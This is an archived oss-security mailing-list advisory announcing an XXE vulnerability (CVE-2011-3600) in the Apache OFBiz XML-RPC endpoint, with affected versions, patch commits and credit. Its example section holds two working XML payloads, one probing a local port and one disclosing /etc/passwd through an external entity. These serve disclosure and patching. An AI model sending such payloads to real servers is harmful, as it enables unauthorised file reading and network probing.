Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 5 Oct 2018 15:52:23 +0300
From: Taher Alkhateeb <slidingfilaments@...il.com>
To: user@...iz.apache.org, dev@...iz.apache.org, security@...iz.apache.org,
 security@...che.org, announce@...che.org, oss-security@...ts.openwall.com,
 jamesp@...dpointgroup.com
Subject: [SECURITY] CVE-2011-3600 Apache OFBiz XML-RPC XXE Vulnerability

Severity:
Important

Vendor:
The Apache Software Foundation

Versions Affected:
OFBiz 16.11.01 to 16.11.04

Description:
The OFBiz XML-RPC event handler 
(org.apache.ofbiz.webapp.event.XmlRpcEventHandler.java)
acts as a wrapper for any OFBiz service that provides XML-RPC web 
services via
the /webtools/control/xmlrpc endpoint. This endpoint is exposed to External
Entity Injection by passing DOCTYPE declarations with executable 
payloads that
discloses the contents of files in the filesystem. In addition, it can 
also be
used to probe for open network ports, and figure out from returned error
messages whether a file exists or not.

Mitigation:
Upgrade to 16.11.05
or manually apply the following commits on branch 16
r1833724
r1833708
r1836141

Example:
# Payload to find an exposed port
<?xml version="1.0"?>
<!DOCTYPE x SYSTEM "http://localhost:8080">
<methodCall>
     <methodName>ping</methodName>
</methodCall>

# Payload to display file contents
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY disclose SYSTEM "file:///etc/passwd">
]>
<methodCall>
     <methodName>&disclose;</methodName>
</methodCall>

Credit:
James Parfet <jamesp at mindpointgroup.com>

References:
http://ofbiz.apache.org/download.html#vulnerabilities

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.